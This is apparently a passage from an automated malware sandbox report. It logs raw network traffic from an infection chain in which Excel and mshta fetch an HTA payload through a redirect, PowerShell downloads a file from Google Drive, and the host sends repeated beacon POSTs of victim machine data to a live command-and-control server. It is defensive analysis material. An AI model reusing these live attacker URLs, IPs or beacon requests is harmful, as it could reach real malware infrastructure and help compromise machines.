                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    38192.168.2.224921194.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:09.214397907 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:09.220051050 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:10.198167086 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    39192.168.2.224921294.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:10.342315912 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:10.347812891 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:11.307137012 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    40192.168.2.224921394.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:11.454469919 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:11.459902048 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:12.407846928 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    41192.168.2.224921494.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:12.541517019 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:12.547430992 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:13.526441097 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    42192.168.2.224921594.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:13.665627956 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:13.671021938 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:14.647675037 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    43192.168.2.224921694.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:14.795512915 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:14.801048040 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:15.776575089 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    44192.168.2.224921794.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:15.916768074 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:15.922363997 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:16.895095110 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    45192.168.2.224921894.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:17.260391951 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:17.265733004 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:18.229682922 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    46192.168.2.224921994.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:18.386853933 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:18.392312050 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                    Oct 29, 2024 10:14:19.358114004 CET236INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.26.1
                                                                                                    Date: Tue, 29 Oct 2024 09:14:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 23
                                                                                                    Connection: close
                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                    Status: 404 Not Found
                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                    Data Ascii: File not found.


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    47192.168.2.224922094.156.177.22080
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:14:19.501027107 CET246OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                    Host: 94.156.177.220
                                                                                                    Accept: */*
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Encoding: binary
                                                                                                    Content-Key: 508F6F5C
                                                                                                    Content-Length: 149
                                                                                                    Connection: close
                                                                                                    Oct 29, 2024 10:14:19.504384995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 36 00 30 00 39 00 32 00 39 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                    Data Ascii: (ckav.ruAlbus609290ALBUS-PC0DE4229FCF97F5879F50F8FD3


                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.2249163172.67.162.954433360C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:12:29 UTC453OUTGET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Host: acesso.run
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:12:29 UTC1066INHTTP/1.1 302 Found
                                                                                                    Date: Tue, 29 Oct 2024 09:12:29 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 111
                                                                                                    Connection: close
                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                    X-Download-Options: noopen
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 0
                                                                                                    Location: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
                                                                                                    Vary: Accept
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lzuL1dEnNbAGHHho86rAp%2Bi0axPaEv9o5la1GzJvNejVuz6lICSupVF9RQYzvP7F8Sr6S3VnVghkpZevSYyF3feu3CDbL0gvur1SONKUAMD5NBwFT09S%2BcMRt8qn"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8da20b4fdaaee7af-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1512&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1035&delivery_rate=1874433&cwnd=78&unsent_bytes=0&cid=22cea6159663a854&ts=385&x=0"
                                                                                                    2024-10-29 09:12:29 UTC111INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 35 2f 34 32 32 2f 73 77 2f 6e 69 63 65 6c 6f 6f 6b 67 69 72 6c 66 72 69 6e 65 64 6f 6e 6d 79 68 65 61 72 74 73 68 65 67 6f 6f 64 66 6f 72 62 65 73 74 74 68 69 67 6e 73 74 6f 64 6f 66 6f 72 6d 65 2e 68 74 61
                                                                                                    Data Ascii: Found. Redirecting to http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.2249165104.21.74.1914433656C:\Windows\System32\mshta.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:12:32 UTC477OUTGET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: fr-FR
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Host: acesso.run
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:12:32 UTC1068INHTTP/1.1 302 Found
                                                                                                    Date: Tue, 29 Oct 2024 09:12:32 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 111
                                                                                                    Connection: close
                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                    X-Download-Options: noopen
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 0
                                                                                                    Location: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
                                                                                                    Vary: Accept
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucwlUNRdmji2nO4o7CEblf3uG7mg%2FCtu01mFhdjtiyWFkFDls6l9med8KezKTyY2Kg6iKxZ5Hp6kbDnVpz2WuCpURq9eq1Gpvh42tRcw1y52fzNvsfj%2FfTVmDb7W"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8da20b623e476bc5-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1211&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1059&delivery_rate=2327974&cwnd=251&unsent_bytes=0&cid=cf93b35a502f0175&ts=1068&x=0"
                                                                                                    2024-10-29 09:12:32 UTC111INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 35 2f 34 32 32 2f 73 77 2f 6e 69 63 65 6c 6f 6f 6b 67 69 72 6c 66 72 69 6e 65 64 6f 6e 6d 79 68 65 61 72 74 73 68 65 67 6f 6f 64 66 6f 72 62 65 73 74 74 68 69 67 6e 73 74 6f 64 6f 66 6f 72 6d 65 2e 68 74 61
                                                                                                    Data Ascii: Found. Redirecting to http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.2249169172.67.162.954433360C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:12:49 UTC453OUTGET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Host: acesso.run
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:12:49 UTC1071INHTTP/1.1 302 Found
                                                                                                    Date: Tue, 29 Oct 2024 09:12:49 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 111
                                                                                                    Connection: close
                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                    X-Download-Options: noopen
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 0
                                                                                                    Location: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
                                                                                                    Vary: Accept
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IvZz0f5Z62P13tdU5%2FHoeOjl3smBdNe%2Fmti9koh%2BZTjwOzD261vDiWTOf%2FZTpBOgGOfblhhitbRTQvvyu7sDo55lRHKRkIZBKA66W2spGAfE80gyKIWtm1Ffnhtx"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8da20bcd4b414857-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1864&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1035&delivery_rate=1550321&cwnd=241&unsent_bytes=0&cid=1f05f8672526136f&ts=335&x=0"
                                                                                                    2024-10-29 09:12:49 UTC111INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 35 2f 34 32 32 2f 73 77 2f 6e 69 63 65 6c 6f 6f 6b 67 69 72 6c 66 72 69 6e 65 64 6f 6e 6d 79 68 65 61 72 74 73 68 65 67 6f 6f 64 66 6f 72 62 65 73 74 74 68 69 67 6e 73 74 6f 64 6f 66 6f 72 6d 65 2e 68 74 61
                                                                                                    Data Ascii: Found. Redirecting to http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.2249168142.250.184.2064432692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:12:49 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                    Host: drive.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:12:49 UTC1319INHTTP/1.1 303 See Other
                                                                                                    Content-Type: application/binary
                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                    Date: Tue, 29 Oct 2024 09:12:49 GMT
                                                                                                    Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-6rgH3XPMiIZz2jMk8eGo5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                    Server: ESF
                                                                                                    Content-Length: 0
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.2249172172.67.162.954432112C:\Windows\System32\mshta.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:12:51 UTC477OUTGET /j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pride=grouchy&affect=acoustic&minute=woozy&neuropathologis HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: fr-FR
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Host: acesso.run
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:12:51 UTC1069INHTTP/1.1 302 Found
                                                                                                    Date: Tue, 29 Oct 2024 09:12:51 GMT
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    Content-Length: 111
                                                                                                    Connection: close
                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                    X-Download-Options: noopen
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 0
